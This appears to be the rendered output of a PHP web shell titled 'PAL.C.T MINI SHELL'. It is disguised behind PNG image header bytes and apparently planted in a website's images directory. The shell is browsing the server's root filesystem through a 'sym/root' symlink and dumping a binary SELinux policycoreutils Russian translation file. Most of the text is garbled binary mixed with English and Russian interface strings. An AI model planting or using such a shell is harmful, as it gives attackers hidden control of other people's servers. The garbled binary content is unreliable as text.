php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/ru/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/ru/LC_MESSAGES/policycoreutils.mo

,<*h8i8}8888?8;9&O99v99997:?:C:L:`:s::::::::::;+;<;U;/^;;;;;G;E<$M<)r<M<5<) =lJ=)==2=L2>K>>">
?(?!G?'i?D?B?@A@@4A&7A,^A%A2AAKB5MBTB<BLC(bC,CPC2	D.<DJkD%D(D4E:E]VECE(E!F$FF%G-=GLkGxG1H(=HfHH2HHHH2H#I1<I2nII I"IIJAL
L
MMP&MwMM!MM"MN$NCN-`N%N(N1N*O2:O(mOO%O$OO P>P[P"{P$P!PP%Q'Q GQ hQQQ$QQ%R'R$CRhR$R'RRRS+S@SXSuS"SSS S T'T @TaTzT$TT%TTU3UKU#kUUUUU5V7VVV!uV(V!V"V!W&'WNW$hW/W/W4W2"XUX?oX$X)X)X.(Y,WY)Y)Y.Y,Z)4Z)^Z.Z,Z$Z!	[+[)G[q[v[
[[	[	[[[[\\
\-)\(W\)\2\2\-]*>]*i]%]%]*].^,:^/g^$^/^+^-_+F_+r_'_$_,_-`0F`.w`+`0`4a+8a(da)a+a,a+b#<b%`b#b)b,b+c+-c+Yc-c+c-c-
d.;d(jd-d/d.d$ e)Ee)oe.e-e*e*!f/Lf-|f*f.f2g+7g*cg.g*g0g+h-Eh-sh+h-h,h+(i,Ti)i*i)i&j+'j,Sj*j,j,j+k-1k*_k*k*k*k)l*5l%`l/l-l)l&m/5m-em/m&m0m#n-?n-mn*n)n%n+o-Bo+po$o(o*o*p$@p0ep-p*p#p+q/?q3oq.q&q4q+.r.Zr*r+r+r+s,8s+es/s+s)s-t*Et*pt-t/t)t,#u+Pu/|u0u*u)v.2v-av+v,v.v-w)Ew*ow)w)w,w,xHxQx1px:x9xNyfyxyWy	y2yJz<ezz zz"z+{&K{r{+{#{{!{%|<|X|!u| | |F|
 }+}
?}M}k}	~}}
}}	};}"~%~,~0~6~
Q~
\~j~v~4~~~ ~6Jenw	

<#X	|	

Āր	
+G%SGýӁׁہ'@Ym	

ʂς27C8T8ƃ̓փ!9Wv&Ƅ"(HMbЅ
!<Ibo:7ˆ"@DJcp,FJ&:'<GH($ˊ05O6̋ҋqY`~|,*׍'.*3Y42Ž4E*p'*)R|",	'<Xq}*ܑ'"'Jr]
	rUv̓	.$*S~L%C4_<ѕ0!-_1,4֖#,/(\("ė9PlǘϘטߘ"*#G7k$ڙ#"F ;,
h/v|'MvCif:OS\Dx$!2AF,(Hޠ2'1ZL)١W[
{%cc"IФZsUΥ
$r/?y\ݨ7]ICߩ:#T^fXKKoITJFYX5|/<_	}iLf4|:_}Z]N]϶-UUкt&FhF1Hzr5!>`_dZĿmbL0=Inx1w=I,VK;U4aA;cMx^f%VrOV<DN(6w97> :_I?6$S[9@G**rAI9)Sc2H/3DcG6H'cp6]biWZ$fMg4S>I/,yCK;6Ur40..F]M=608gCg>L@L`@zSGQW.OZ(Yb\@2tJEVU^=XTSJ]VfSen h?H8Fe.(3\$u*&H']>93-CaC=;'3c66A8G6959'5a7558;5t67:8T5:E4D9y3565T4633*5^444735k7789J7985/3e3874>;s@7@(7iX43/7c394	6>6u46G4`523226e4535;5q4633G3{3246K@727.9f797:J3663'2[546505f9:45FA|744+5`9=76F=}584*5_556589n4373I4}7W3B6v5I:-4h387
	4B	5w	8	7	3
HR
2
2
668o9S]Dn(X


M\.)8XFDb]?RMq?SbS71? ;`;t)M<w29#!EU,q#u=JA6eQ+6284k/;&030d0I5NKhA,
h7)gd2!+#&O0vC%' 
9 G ^ e   ( ^ &4![!0q!O!Y!L"["h"""E""D"C>#D#1#S#M$(g$/$($M$7%*@%^k%(% %*&?&:Z&&&&&&' ''"H'#k'{'s(;(:(((0)1)0M)v~**d++|,ZA.r.//;/9/*,0<W0#0g0p 1q122(%2N2.31;30m334K55ck6p6W@7X7V7XH8_8(9**9(U9f~:E:9+;Oe;j;@ <Ba<-<C<9= P=<q=-=@=P>]n>=>J
?}U?5?	@5@/A!KAmAmB@CUC<sCCCUC[/D3DDhD/AEqEuEW}EMEq#FxF<G8KGGGGG2mHWH4H#-IEQISIVI)BJRlJ=J?J(=K$fK;K/K1K0)LZLoLwLLLLLLL1L/L*M]<M	MMMM2MMNNN&-NPTNNk	je~a!l@1CIc&jh'2,;<B(0F]4po%=vs(9/l{y%bC1iCX:$%|ffTHK@7IQ
GH
)s)W&3m.DI]T"vAh5 66F
a
k80uu|RY'*$4zOe !mG8beZq^wS!|YZ
sJzKi5kO(-
Gw*.VUE>;JczV-}=E\PY-+{P1$p<dX,Rg2t[rqU`g<@j^QwS_J+}yFxqyD	B ?xr0i~n_MaK.Tl~v>Sn:UfA+rNn3B_[9)`"dERW]LO5g8?pt\*`bhH>c3N[xu?}6#DM2ZQPo#M#Ad'4o/=/^7\	W,":LtVX;m&L{79%s changed labels.
%s is already in %s%s is not a valid context
%s is not in %s%s must be a directory%s!  Could not get current context for %s, not relabeling tty.
%s!  Could not get new context for %s, not relabeling tty.
%s!  Could not set new context for %s
%s:  Can't load policy and enforcing mode requested:  %s
%s:  Can't load policy:  %s
%s:  Policy is already loaded and initial load requested
******************** IMPORTANT ***********************
...600-1024<b>Applications</b><b>Login Users</b><b>Root Users</b><b>Select:</b><b>TCP Ports</b><b>UDP Ports</b>AddAdd %sAdd Booleans DialogAdd File ContextAdd Network PortAdd SELinux Login MappingAdd SELinux Network PortsAdd SELinux UserAdd SELinux User MappingAdd UserAddr %s is defined in policy, cannot be deletedAddr %s is not definedAdminAdmin User RoleAllAllow SELinux webadm user to manage unprivileged users home directoriesAllow SELinux webadm user to read unprivileged users home directoriesAllow Samba to share nfs directoriesAllow Spam Assassin daemon network accessAllow X-Windows server to map a memory region as both executable and writableAllow all daemons the ability to use unallocated ttysAllow all daemons to write corefiles to /Allow cdrecord to read various content. nfs, samba, removable devices, user temp and untrusted content filesAllow clients to write to X shared memoryAllow daemons to run with NISAllow evolution and thunderbird to read user filesAllow gadmin SELinux user account to execute files in home directory or /tmpAllow guest SELinux user account to execute files in home directory or /tmpAllow java executable stackAllow mount to mount any directoryAllow mount to mount any fileAllow mplayer executable stackAllow normal user to execute pingAllow pppd to be run for a regular userAllow privileged utilities like hotplug and insmod to run unconfinedAllow programs to read files in non-standard locations (default_t)Allow rc scripts to run unconfined, including any daemon started by an rc script that does not have a domain transition explicitly definedAllow regular users direct mouse access (only allow the X server)Allow rpm to run unconfinedAllow sasl authentication server to read /etc/shadowAllow spamd to access home directoriesAllow squid daemon to connect to the networkAllow ssh logins as sysadm_r:sysadm_tAllow ssh to run from inetd instead of as a daemonAllow ssh to run ssh-keysignAllow staff SELinux user account to execute files in home directory or /tmpAllow staff Web Browsers to write to home directoriesAllow staff_r users to search the sysadm home dir and read files (such as ~/.bashrc)Allow stunnel daemon to run as standalone, outside of xinetdAllow sysadm SELinux user account to execute files in home directory or /tmpAllow sysadm_t to directly start daemonsAllow the mozilla browser to read user filesAllow unconfined SELinux user account to execute files in home directory or /tmpAllow unconfined to dyntrans to unconfined_execmemAllow unlabeled packets to flow on the networkAllow user SELinux user account to execute files in home directory or /tmpAllow user to connect to mysql socketAllow user to connect to postgres socketAllow user to r/w noextattrfile (FAT, CDROM, FLOPPY)Allow user to stat ttyfilesAllow user_r to reach sysadm_r via su, sudo, or userhelper. Otherwise, only staff_r can do soAllow users to control network interfaces (also needs USERCTL=true)Allow users to execute the mount commandAllow users to run TCP servers (bind to ports and accept connection from the same domain and outside users)  disabling this forces FTP passive mode and may change other protocolsAllow users to run the dmesg commandAllow users to rw usb devicesAllow xdm logins as sysadm_r:sysadm_tAllow xen to read/write physical disk devicesAllow xguest SELinux user account to execute files in home directory or /tmpAllow xinetd to run unconfined, including any services it starts that do not have a domain transition explicitly definedApplicationAre you sure you want to delete %s '%s'?Bad format %s: Record %sBooleanBoolean %s is defined in policy, cannot be deletedBoolean %s is not definedBoolean NameCVSCan not combine +/- with other types of categoriesCan not have multiple sensitivitiesCan not modify sensitivity levels using '+' on %sCannot find your entry in the shadow passwd file.
Cannot read policy store.Change process mode to enforcingChange process mode to permissive.Changing the policy type will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?Changing to SELinux disabled requires a reboot.  It is not recommended.  If you later decide to turn SELinux back on, the system will be required to relabel.  If you just want to see if SELinux is causing a problem on your system, you can go to permissive mode which will only log errors and not enforce SELinux policy.  Permissive mode does not require a reboot    Do you wish to continue?Changing to SELinux enabled will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?CompatibilityConfigue SELinuxContextCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Could not add SELinux user %sCould not add addr %sCould not add file context for %sCould not add interface %sCould not add login mapping for %sCould not add port %s/%sCould not add prefix %s for %sCould not add role %s for %sCould not check if SELinux user %s is definedCould not check if addr %s is definedCould not check if boolean %s is definedCould not check if file context for %s is definedCould not check if interface %s is definedCould not check if login mapping for %s is definedCould not check if port %s/%s is definedCould not close descriptors.
Could not commit semanage transactionCould not create SELinux user for %sCould not create a key for %sCould not create a key for %s/%sCould not create addr for %sCould not create context for %sCould not create context for %s/%sCould not create file context for %sCould not create interface for %sCould not create key for %sCould not create login mapping for %sCould not create port for %s/%sCould not create semanage handleCould not delete SELinux user %sCould not delete addr %sCould not delete boolean %sCould not delete file context for %sCould not delete interface %sCould not delete login mapping for %sCould not delete port %s/%sCould not delete the file context %sCould not delete the port %sCould not determine enforcing mode.
Could not establish semanage connectionCould not extract key for %sCould not list SELinux modulesCould not list SELinux usersCould not list addrsCould not list booleansCould not list file contextsCould not list interfacesCould not list local file contextsCould not list login mappingsCould not list portsCould not list roles for user %sCould not list the file contextsCould not list the portsCould not modify SELinux user %sCould not modify addr %sCould not modify boolean %sCould not modify file context for %sCould not modify interface %sCould not modify login mapping for %sCould not modify port %s/%sCould not open file %s
Could not query addr %sCould not query file context %sCould not query file context for %sCould not query interface %sCould not query port %s/%sCould not query seuser for %sCould not query user for %sCould not remove permissive domain %s (remove failed)Could not set MLS level for %sCould not set MLS range for %sCould not set SELinux user for %sCould not set active value of boolean %sCould not set addr context for %sCould not set exec context to %s.
Could not set file context for %sCould not set interface context for %sCould not set mask for %sCould not set message context for %sCould not set mls fields in addr context for %sCould not set mls fields in file context for %sCould not set mls fields in interface context for %sCould not set mls fields in port context for %s/%sCould not set name for %sCould not set permissive domain %s (module installation failed)Could not set port context for %s/%sCould not set role in addr context for %sCould not set role in file context for %sCould not set role in interface context for %sCould not set role in port context for %s/%sCould not set type in addr context for %sCould not set type in file context for %sCould not set type in interface context for %sCould not set type in port context for %s/%sCould not set user in addr context for %sCould not set user in file context for %sCould not set user in interface context for %sCould not set user in port context for %s/%sCould not start semanage transactionCould not test MLS enabled statusCouldn't get default type.
Create/Manipulate temporary files in /tmpCronCurrent Enforcing ModeCustomizedDBUS System DaemonDatabasesDelete %sDelete File ContextDelete Network PortDelete SELinux User MappingDelete UserDescriptionDisable AuditDisable SELinux protection for Cluster ServerDisable SELinux protection for EvolutionDisable SELinux protection for Hal daemonDisable SELinux protection for NIS Password DaemonDisable SELinux protection for NIS Transfer DaemonDisable SELinux protection for NetworkManagerDisable SELinux protection for ThunderbirdDisable SELinux protection for acct daemonDisable SELinux protection for amandaDisable SELinux protection for amavisDisable SELinux protection for apmd daemonDisable SELinux protection for arpwatch daemonDisable SELinux protection for auditd daemonDisable SELinux protection for automount daemonDisable SELinux protection for avahiDisable SELinux protection for bluetooth daemonDisable SELinux protection for canna daemonDisable SELinux protection for cardmgr daemonDisable SELinux protection for ciped daemonDisable SELinux protection for clamd daemonDisable SELinux protection for clamscanDisable SELinux protection for clvmdDisable SELinux protection for comsat daemonDisable SELinux protection for courier daemonDisable SELinux protection for cpucontrol daemonDisable SELinux protection for cpuspeed daemonDisable SELinux protection for crond daemonDisable SELinux protection for cups hplip daemonDisable SELinux protection for cupsd back end serverDisable SELinux protection for cupsd daemonDisable SELinux protection for cupsd_lpdDisable SELinux protection for cvs daemonDisable SELinux protection for cyrus daemonDisable SELinux protection for dbskkd daemonDisable SELinux protection for dbusd daemonDisable SELinux protection for dccdDisable SELinux protection for dccifdDisable SELinux protection for dccmDisable SELinux protection for ddt daemonDisable SELinux protection for devfsd daemonDisable SELinux protection for dhcpc daemonDisable SELinux protection for dhcpd daemonDisable SELinux protection for dictd daemonDisable SELinux protection for distccd daemonDisable SELinux protection for dmesg daemonDisable SELinux protection for dnsmasq daemonDisable SELinux protection for dovecot daemonDisable SELinux protection for entropyd daemonDisable SELinux protection for fetchmailDisable SELinux protection for fingerd daemonDisable SELinux protection for freshclam daemonDisable SELinux protection for fsdaemon daemonDisable SELinux protection for gamesDisable SELinux protection for gpm daemonDisable SELinux protection for gss daemonDisable SELinux protection for hostname daemonDisable SELinux protection for hotplug daemonDisable SELinux protection for howl daemonDisable SELinux protection for http suexecDisable SELinux protection for httpd rotatelogsDisable SELinux protection for hwclock daemonDisable SELinux protection for i18n daemonDisable SELinux protection for imazesrv daemonDisable SELinux protection for inetd child daemonsDisable SELinux protection for inetd daemonDisable SELinux protection for innd daemonDisable SELinux protection for iptables daemonDisable SELinux protection for ircd daemonDisable SELinux protection for irqbalance daemonDisable SELinux protection for iscsi daemonDisable SELinux protection for jabberd daemonDisable SELinux protection for kadmind daemonDisable SELinux protection for klogd daemonDisable SELinux protection for krb5kdc daemonDisable SELinux protection for ktalk daemonsDisable SELinux protection for kudzu daemonDisable SELinux protection for locate daemonDisable SELinux protection for lpd daemonDisable SELinux protection for lrrd daemonDisable SELinux protection for lvm daemonDisable SELinux protection for mailmanDisable SELinux protection for mdadm daemonDisable SELinux protection for monopd daemonDisable SELinux protection for mrtg daemonDisable SELinux protection for mysqld daemonDisable SELinux protection for nagios daemonDisable SELinux protection for named daemonDisable SELinux protection for nessusd daemonDisable SELinux protection for nfsd daemonDisable SELinux protection for nmbd daemonDisable SELinux protection for nrpe daemonDisable SELinux protection for nscd daemonDisable SELinux protection for nsd daemonDisable SELinux protection for ntpd daemonDisable SELinux protection for oddjobDisable SELinux protection for oddjob_mkhomedirDisable SELinux protection for openvpn daemonDisable SELinux protection for pam daemonDisable SELinux protection for pegasusDisable SELinux protection for perdition daemonDisable SELinux protection for portmap daemonDisable SELinux protection for portslave daemonDisable SELinux protection for postfixDisable SELinux protection for postgresql daemonDisable SELinux protection for pptpDisable SELinux protection for prelink daemonDisable SELinux protection for privoxy daemonDisable SELinux protection for ptal daemonDisable SELinux protection for pxe daemonDisable SELinux protection for pyzordDisable SELinux protection for quota daemonDisable SELinux protection for radiusd daemonDisable SELinux protection for radvd daemonDisable SELinux protection for rdiscDisable SELinux protection for readaheadDisable SELinux protection for restorecondDisable SELinux protection for rhgb daemonDisable SELinux protection for ricciDisable SELinux protection for ricci_modclusterdDisable SELinux protection for rlogind daemonDisable SELinux protection for rpcd daemonDisable SELinux protection for rshdDisable SELinux protection for rsync daemonDisable SELinux protection for saslauthd daemonDisable SELinux protection for scannerdaemon daemonDisable SELinux protection for sendmail daemonDisable SELinux protection for setransDisable SELinux protection for setroubleshoot daemonDisable SELinux protection for slapd daemonDisable SELinux protection for slrnpull daemonDisable SELinux protection for smbd daemonDisable SELinux protection for snmpd daemonDisable SELinux protection for snort daemonDisable SELinux protection for sound daemonDisable SELinux protection for soundd daemonDisable SELinux protection for spamd daemonDisable SELinux protection for speedmgmt daemonDisable SELinux protection for squid daemonDisable SELinux protection for ssh daemonDisable SELinux protection for stunnel daemonDisable SELinux protection for swat daemonDisable SELinux protection for sxid daemonDisable SELinux protection for syslogd daemonDisable SELinux protection for system cron jobsDisable SELinux protection for tcp daemonDisable SELinux protection for telnet daemonDisable SELinux protection for tftpd daemonDisable SELinux protection for the web browsersDisable SELinux protection for transproxy daemonDisable SELinux protection for udev daemonDisable SELinux protection for uml daemonDisable SELinux protection for updfstab daemonDisable SELinux protection for uptimed daemonDisable SELinux protection for uucpd daemonDisable SELinux protection for vmware daemonDisable SELinux protection for watchdog daemonDisable SELinux protection for winbind daemonDisable SELinux protection for xdm daemonDisable SELinux protection for xen controlDisable SELinux protection for xen daemonDisable SELinux protection for xfs daemonDisable SELinux protection for ypbind daemonDisable SELinux protection for ypserv daemonDisabledDisabled
Permissive
Enforcing
Do not allow any processes to load kernel modulesDo not allow any processes to modify kernel SELinux policyDo not allow transition to sysadm_t, sudo and su effectedDo not audit things that we know to be broken but which are not security risksEdit Network PortEnable AuditEnable/Disable additional audit rules, that are normally not reported in the log files.EnforcingEnter complete path for executable to be confined.Enter complete path to init script used to start the confined application.Enter unique name for the confined application or user role.Error allocating memory.
Error allocating shell's argv0.
Error changing uid, aborting.
Error connecting to audit system.
Error dropping SETUID capability, aborting
Error dropping capabilities, aborting
Error freeing caps
Error initializing capabilities, aborting.
Error resetting KEEPCAPS, aborting
Error sending audit message.
Error setting KEEPCAPS, aborting
Error setting capabilities, aborting
Error!  Could not open %s.
Error!  Shell is not valid.
Error: multiple levels specified
Error: multiple roles specified
Error: multiple types specified
Error: you are not allowed to change levels on a non secure terminal 
ExecutableExisting User RolesExisting_UserFailed to close tty properly
File
SpecificationFile
TypeFile Contexts fileFile LabelingFile SpecificationFile TypeFile context for %s is defined in policy, cannot be deletedFile context for %s is not definedFilterGPLGamesGenerate new policy moduleGroup ViewHTTPD ServiceInit scriptInteracts with the terminalInterface %s is defined in policy, cannot be deletedInterface %s is not definedInterface fileInternet Services Daemon (inetd)Internet Services Daemon are daemons started by xinetdInvalid file specificationKerberosLabelingLinux Group %s does not existLinux User %s does not existList ViewLoad Policy ModuleLoad policy moduleLockdown...Login
NameLogin '%s' is requiredLogin NameLogin mapping for %s is defined in policy, cannot be deletedLogin mapping for %s is not definedMCS LevelMCS RangeMLSMLS/MLS/
MCS RangeMLS/MCS
LevelMLS/MCS RangeMemory ProtectionMinimal Terminal User RoleMinimal X Windows User RoleModify %sModify File ContextModify SELinux User MappingModify UserModify an existing login user record.Module %s.pp already loaded in current policy.
Do you want to continue?Module NameMountNFSNISNameName ServiceNetwork ConfigurationNetwork PortNo context in file %s
Node Address is requiredNode Netmask is requiredNot yet implementedOptions Error %s Out of memory!
Password:PermissivePolgenPolicy DirectoryPolicy ModulePortPort %s/%s already definedPort %s/%s is defined in policy, cannot be deletedPort %s/%s is not definedPort NumberPort is requiredPort number "%s" is not valid.  0 < PORT_NUMBER < 65536 Ports must be numbers or ranges of numbers from 1 to %d PrefixPrintingProcess DomainProtoProtocolProtocol udp or tcp is requiredRed Hat 2007Relabel on next reboot.Remove loadable policy moduleRequires at least one categoryRequires prefix or rolesRequires prefix, roles, level or rangeRequires setypeRequires setype or serangeRequires setype, serange or seuserRequires seuser or serangeRevert boolean setting to system defaultRoleRoot Admin User RoleRun booleans lockdown wizardSASL authentication serverSELinux
UserSELinux AdministrationSELinux InterfaceSELinux Policy Generation ToolSELinux Port
TypeSELinux Port TypeSELinux RolesSELinux Service ProtectionSELinux TypeSELinux Type is requiredSELinux UserSELinux booleanSELinux fcontextSELinux policy is not managed or store cannot be accessed.SELinux user %s is defined in policy, cannot be deletedSELinux user %s is not definedSELinux user '%s' is requiredSSHSambaSelect Management ObjectSelect PortsSelect Root Administrator User Role, if this user will be used to administer the machine while running as root.  This user will not be able to login to the system directly.Select directory to generate policy files inSelect directory(s) that the confined application owns and writes intoSelect executable file to be confined.Select file(s) that confined application creates or writesSelect if you wish to relabel then entire file system on next reboot.  Relabeling can take a very long time, depending on the size of the system.  If you are changing policy types or going from disabled to enforcing, a relabel is required.Select init script file to be confined.Select the domains that you would like this user administer.Select the user roles that will transiton to this applications domains.Selinux
File TypeSemanage transaction already in progressSemanage transaction not in progressSends audit messagesSends emailSetup ScriptSorry, -l may be used with SELinux MLS support.
Sorry, newrole may be used only on a SELinux kernel.
Sorry, run_init may be used only on a SELinux kernel.
Spam ProtectionSquidStandard Init DaemonStandard Init Daemon are daemons started on boot via init scripts.  Usually requires a script in /etc/rc.d/init.dStatusSystem Default Enforcing ModeSystem Default Policy Type: This user can login to a machine via X or terminal.  By default this user will have no setuid, no networking, no sudo, no suThis user will login to a machine only via a terminal or remote login.  By default this user will have  no setuid, no networking, no su, no sudo.To make this policy package active, execute:Toggle between Customized and All BooleansToggle between Customized and All PortsToggle between all and customized file contextTransition staff SELinux user to Web Browser DomainTransition sysadm SELinux user to Web Browser DomainTransition user SELinux user to Web Browser DomainTransition xguest SELinux user to Web Browser DomainType %s_t already defined in current policy.
Do you want to continue?Type Enforcement fileType is requiredUSAGE: run_init <script> <args ...>
  where: <script> is the name of the init script to run,
         <args ...> are the arguments to that script.USER Types automatically get a tmp typeUnable to allocate memory for new_contextUnable to clear environment
Unable to obtain empty signal set
Unable to restore the environment, aborting
Unable to restore tty label...
Unable to set SIGHUP handler
Universal SSL tunnelUnknown or missing protocolUnreserved Ports (>1024)Usage %s -LUsage %s -L -l userUsage %s -d File ...Usage %s -l -d user ...Usage %s -l CATEGORY user ...Usage %s -l [[+|-]CATEGORY],...]q user ...Usage %s CATEGORY File ...Usage %s [[+|-]CATEGORY],...]q File ...Use -- to end option list.  For exampleUser ApplicationUser Application are any application that you would like to confine that is started by a userUser MappingUser PrivsUser RoleUser with full networking, no setuid applications without transition, no su, can sudo to Root Administration RolesUser with full networking, no setuid applications without transition, no sudo, no su.Uses Pam for authenticationUses dbusUses nsswitch or getpw* callsVerify NameVersionWarning!  Could not retrieve tty information.
Warning! Could not restore context for %s
Web Application/Script (CGI)Web ApplicationsWeb Applications/Script (CGI) CGI scripts started by the web server (apache)Writes syslog messages	XENXServerYou must add at least one role for %sYou must enter a executableYou must enter a name for your confined process/userYou must enter the executable path for your confined processYou must select a userYou must specify one of the following values: %s_Delete_Propertiesallall files
regular file
directory
character device
block device
socket
symbolic link
named pipe
authentication failed.
cannot find valid entry in the passwd file.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererror on reading PAM service configuration.
failed to build new range with level %s
failed to convert new context to string
failed to exec shell
failed to get account information
failed to get new context.
failed to get old_context.
failed to initialize PAM
failed to set PAM_TTY
failed to set new range %s
failed to set new role %s
failed to set new type %s
getpass cannot open /dev/tty
globallabel37label38label39label41label42label44label50label59newrole:  %s:  error on line %lu.
newrole: failure forking: %snewrole: incorrect password for %s
newrole: service name configuration hashtable overflow
offonpppdrsyncrun_init: incorrect password for %s
system-config-selinuxtranslator-creditstypeunknownusage:  %s [-qi]
use_syslog must be a boolean value Project-Id-Version: ru
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-10-17 23:48+0000
PO-Revision-Date: 2010-07-28 10:34
Last-Translator: Yulia <ypoyarko@redhat.com>
Language-Team: Russian
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: 
X-Generator: KBabel 1.11.4
Plural-Forms:  nplurals=3; plural=(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2);
%s изменило метки.
%s уже в %s%s не является верным контекстом
%s не в %s%s должна быть директорией%s!  Невозможно получить текущий контекст для %s, метка tty не изменяется.
%s!  Невозможно получить новый контекст для %s, метка tty не изменяется.
%s!  Невозможно задать новый контекст для %s
%s:  не удалось загрузить запрошенную политику и строгий режим:  %s
%s:  Невозможно загрузить политику:  %s
%s:  Политика уже загружена, исходная загрузка запрошена
********************* ВАЖНО ************************
...600-1024<b>Приложения</b><b>Зарегистрированные пользователи</b><b>Пользователи root</b><b>Выбор:</b><b>Порты TCP</b><b>Порты UDP</b>ДобавитьДобавить %sДобавить диалог для переключателейДобавить контекст файлаДобавить сетевой портДобавить соответствие авторизации SELinuxДобавить сетевые порты SELinuxДобавить пользователя SELinuxДобавить соответствие пользователей SELinuxДобавить пользователяAddr %s определен в политике и не может быть удаленAddr %s не определенАдминРоль администратораВсеРазрешить пользователю webadm управлять домашними каталогами непривилегированных пользователейРазрешить пользователю webadm осуществлять чтение домашних каталогов непривилегированных пользователейРазрешить Samba открыть совместный доступ к каталогам NFSРазрешить сетевой доступ демону Spam AssassinРазрешить серверу X-Windows обозначать регион памяти как исполняемый и доступный для записиРазрешить всем демонам использовать незанятые ttyРазрешить всем демонам осуществлять запись в /Разрешить cdrecord осуществлять чтение различной информации с NFS, Samba, из временных каталогов пользователей, недоверенных файлов и съемных устройствРазрешить клиентам осуществлять запись в разделяемую память XРазрешить демонам исполняться с NISРазрешить Evolution и Thunderbird осуществлять чтение файлов пользователейРазрешить учетной записи gadmin исполнять файлы в домашнем каталоге и /tmpРазрешить учетной записи guest исполнять файлы в домашнем каталоге и /tmpРазрешить исполняемый стек javaРазрешить монтирование любых каталоговРазрешить монтирование любых файловРазрешить исполняемый стек mplayerРазрешить обычным пользователям выполнять pingРазрешить исполнение pppd в режиме обычного пользователяРазрешить привилегированным утилитам (например, hotplug и insmod) выполняться без ограниченийРазрешить программам осуществлять чтение файлов из нестандартных источников (default_t)Разрешить выполнение сценариев rc без ограничений, включая демон, запускаемый сценарием rc, для которого не задан явно домен переходаРазрешить обычным пользователям осуществлять прямой доступ с помощью мыши (только для сервера X)Разрешить rpm исполняться без ограниченийРазрешить серверу авторизации sasl осуществлять чтение /etc/shadowРазрешить spamd обращаться к домашним каталогамРазрешить демону squid подключаться к сетиРазрешить авторизацию ssh для sysadm_r:sysadm_tРазрешить запуск ssh из inted, а не в качестве демонаРазрешить ssh исполнять ssh-keysignРазрешить пользователю staff исполнять файлы в домашнем каталоге и /tmpРазрешить браузерам пользователя staff осуществлять запись в домашние каталогиРазрешить пользователям staff_r выполнять поиск в домашнем каталоге и осуществлять чтение файлов (например, ~/.bashrc)Разрешить демону stunnel выполняться независимо от xinetdРазрешить пользователю sysadm исполнять файлы в домашнем каталоге и /tmpРазрешить sysadm_t запускать службы напрямуюРазрешить Mozilla осуществлять чтение файлов пользователяРазрешить неограниченной учетной записи SELinux исполнять файлы в домашнем каталоге и /tmpРазрешить неограниченным компонентам выполнять dyntrans для unconfined_execmemРазрешить прохождение по сети неотмеченных пакетовРазрешить пользователям user исполнять файлы в домашнем каталоге и /tmpРазрешить пользователю подключаться к сокету mysqlРазрешить пользователю подключаться к сокету postgresРазрешить пользователям выполнять чтение и запись noextattrfile (FAT, CDROM, FLOPPY)Разрешить пользователям исполнять stat для файлов ttyРазрешить пользователю user_r обращаться к sysadm_r через su, sudo или userhelper. В противном случае только staff_r сможет осуществлять обращениеРазрешить пользователям управлять сетевыми интерфейсами (также требуется USERCTL=true)Разрешить пользователям исполнять команду mountРазрешить пользователям запускать серверы TCP (осуществлять сопоставление портов и принимать подключения из того же домена и внешних пользователей). Отключение этой возможности вызовет переход в пассивный режим FTP и может изменить другие протоколыРазрешить пользователям исполнять команду dmesgРазрешить пользователям выполнять чтение и запись устройств USBРазрешить авторизацию xdm как sysadm_r:sysadm_tРазрешить xen осуществлять запись и чтение физических дисковых устройствРазрешить учетной записи xguest исполнять файлы в домашнем каталоге и /tmpРазрешить демону xinetd выполняться без ограничений, что включает все запускаемые им службы, для которых явно не заданы преобразования доменовПриложениеВы действительно хотите удалить %s «%s»?Неверный формат %s: Запись %sПереключательПереключатель %s не определен в политике и не может быть удаленПереключатель %s не определенИмя переключателяCVSНевозможно объединить +/- с другими типами категорийНельзя иметь несколько уровней чувствительностиНельзя изменить уровень чувствительности используя  '+' на %sНе удалось найти вашу запись в теневом файле паролей.
Невозможно прочитать хранилище политики.Изменить режим на строгий.Изменить режим процесса на разрешающий.Изменение типа политики потребует переразметки всей файловой системы при следующей загрузке. Процесс переразметки может быть достаточно длительным в зависимости от размера файловой системы. Продолжить?Отключение политики SELinux требует перезагрузки и не рекомендуется. Если в дальнейшем вы захотите включить SELinux, потребуется выполнить переразметку файловой системы. Если же вы просто хотите проверить, не вызывает ли SELinux проблем в системе, используйте разрешающий режим, который не принуждает политику, но при этом регистрирует ошибки в журнале. Разрешающий режим не требует перезагрузки. Продолжить?Активация политики SELinux потребует переразметки всей файловой системы при следующей загрузке. Процесс переразметки может быть достаточно длительным в зависимости от размера файловой системы. Продолжить?СовместимостьНастройка SELinuxКонтекст(c) 2006 Red Hat, Inc.
(c) 2006 Dan Walsh <dwalsh@redhat.com>Невозможно добавить пользователя SELinux %sНе удалось добавить addr %sНевозможно добавить контекст файла для %sНевозможно добавить интерфейс %sНевозможно добавить сопоставление входа для %sНевозможно добавить порт %s/%sНевозможно добавить префикс %s для %sНевозможно добавить роль %s для %sНе удалось проверить, определен ли пользователь SELinux %sНе удалось проверить, определен ли адрес %sНевозможно проверить, определен ли переключатель %sНевозможно проверить, определен ли контекст файла для %sНевозможно проверить, определен ли интерфейс %sНевозможно проверить, определено ли сопоставление входа для %sНевозможно проверить, определен ли порт %s/%sНевозможно закрыть дескрипторы.
